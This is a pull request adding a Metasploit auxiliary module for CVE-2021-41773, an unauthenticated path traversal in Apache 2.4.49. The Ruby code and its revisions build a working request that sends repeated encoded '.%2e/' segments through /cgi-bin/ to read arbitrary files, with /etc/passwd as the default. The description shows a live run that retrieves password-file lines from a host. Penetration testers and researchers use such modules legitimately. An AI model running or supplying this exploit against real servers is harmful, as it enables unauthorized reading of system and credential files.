### PR TITLE
CVE-2021-41773 - Apache v2.4.49 Path Traversal

### DIFF
--- a/modules/auxiliary/scanner/http/apache_webserver_traversal.rb
+++ b/modules/auxiliary/scanner/http/apache_webserver_traversal.rb
@@ -9,42 +9,48 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Path Traversal in Apache 2.4.49',
-      'Description' => %q{
-        This module exploits an unauthenticated directory traversal vulnerability which exists in Apache version 2.4.49.
-        If files outside of the document root are not protected by ‘require all denied’ these requests can succeed.
-      },
-      'References'  =>
-        [
-          ['CVE', '2021-41773'],
-          ['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],
-          ['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse']
-        ],
-      'Author'      =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Path Traversal in Apache 2.4.49',
+        'Description' => %q{
+          This module exploits an unauthenticated directory traversal vulnerability which exists in Apache version 2.4.49.
+          If files outside of the document root are not protected by ‘require all denied’ these requests can succeed.
+        },
+        'Author' => [
           'Ash Daulton', # Vulnerability discovery
-          'Dhiraj Mishra' # Metasploit module
+          'Dhiraj Mishra', # Metasploit Module
         ],
-      'DisclosureDate' => '2021-05-10',
-      'License'     => MSF_LICENSE
-    ))
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2021-41773']
+        ],
+        'DisclosureDate' => '2021-10-05',
+        'Platform' => 'ruby',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(443),
-        OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']),
+        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
         OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 5 ])
-      ])
+      ]
+    )
   end
 
   def run_host(ip)
     filename = datastore['FILEPATH']
-    traversal = ".%2e/" * datastore['DEPTH'] << filename
+    traversal = '.%2e/' * datastore['DEPTH'] << filename
 
     res = send_request_raw({
       'method' => 'GET',
-      'uri'    => "/cgi-bin/#{traversal}"
+      'uri' => "/cgi-bin/#{traversal}"
     })
 
     unless res && res.code == 200

--- a/modules/auxiliary/scanner/http/apache_webserver_traversal.rb
+++ b/modules/auxiliary/scanner/http/apache_webserver_traversal.rb
@@ -1,0 +1,65 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Path Traversal in Apache 2.4.49',
+      'Description' => %q{
+        This module exploits an unauthenticated directory traversal vulnerability which exists in Apache version 2.4.49. 
+        If files outside of the document root are not protected by ‘require all denied’ these requests can succeed.
+      },
+      'References'  =>
+        [
+          ['CVE', '2021-41773'],
+          ['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],
+          ['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse']
+        ],
+      'Author'      =>
+        [
+          'Ash Daulton', # Vulnerability discovery
+          'Dhiraj Mishra' # Metasploit module
+        ],
+      'DisclosureDate' => '2021-05-10',
+      'License'     => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']),
+        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 5 ])
+      ])
+  end
+
+  def run_host(ip)
+    filename = datastore['FILEPATH']
+    traversal = ".%2e/" * datastore['DEPTH'] << filename
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => "/cgi-bin/#{traversal}"
+    })
+
+    unless res && res.code == 200
+      print_error('Nothing was downloaded')
+      return
+    end
+
+    vprint_good("#{peer} - #{res.body}")
+    path = store_loot(
+      'apache.41773.traversal',
+      'text/plain',
+      ip,
+      res.body,
+      filename
+    )
+    print_good("File saved in: #{path}")
+  end
+end

--- a/modules/auxiliary/scanner/http/apache_webserver_traversal.rb
+++ b/modules/auxiliary/scanner/http/apache_webserver_traversal.rb
@@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary
           ['CVE', '2021-41773']
         ],
         'DisclosureDate' => '2021-10-05',
-        'Platform' => 'ruby',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],

--- a/modules/auxiliary/scanner/http/apache_webserver_traversal.rb
+++ b/modules/auxiliary/scanner/http/apache_webserver_traversal.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'        => 'Path Traversal in Apache 2.4.49',
       'Description' => %q{
-        This module exploits an unauthenticated directory traversal vulnerability which exists in Apache version 2.4.49. 
+        This module exploits an unauthenticated directory traversal vulnerability which exists in Apache version 2.4.49.
         If files outside of the document root are not protected by ‘require all denied’ these requests can succeed.
       },
       'References'  =>

--- a/modules/auxiliary/scanner/http/apache_webserver_traversal.rb
+++ b/modules/auxiliary/scanner/http/apache_webserver_traversal.rb
@@ -53,14 +53,14 @@ class MetasploitModule < Msf::Auxiliary
     })
 
     unless res && res.code == 200
-      print_error('Nothing was downloaded')
+      vprint_error('Nothing was downloaded')
       return
     end
 
     vprint_good("#{peer} - #{res.body}")
     path = store_loot(
-      'apache.41773.traversal',
-      'text/plain',
+      'apache.traversal',
+      'application/octet-stream',
       ip,
       res.body,
       filename


### PR DESCRIPTION
## Summary
```
This module exploits an unauthenticated directory traversal vulnerability which exists in Apache version 2.4.49. 
If files outside of the document root are not protected by ‘require all denied’ these requests can succeed.
```

## Steps to verify 
```
msf6 > use auxiliary/scanner/http/apache_webserver_traversal 
msf6 auxiliary(scanner/http/apache_webserver_traversal) > set RHOSTS 192.168.1.124
RHOSTS => 192.168.1.124
msf6 auxiliary(scanner/http/apache_webserver_traversal) > run

[+] File saved in: /Users/zero/.msf4/loot/20211006092302_default_192.168.1.124_apache.traversal_232567.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/apache_webserver_traversal) > cat /Users/zero/.msf4/loot/20211006092302_default_192.168.1.124_apache.traversal_232567.txt | head 
[*] exec: cat /Users/zero/.msf4/loot/20211006092302_default_192.168.1.124_apache.traversal_232567.txt | head 

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
....
msf6 auxiliary(scanner/http/apache_webserver_traversal) >
``` 

## References

NVD: [CVE-2021-41773](https://nvd.nist.gov/vuln/detail/CVE-2021-41773)
Twitter: https://twitter.com/RandomDhiraj/status/1445431445586120715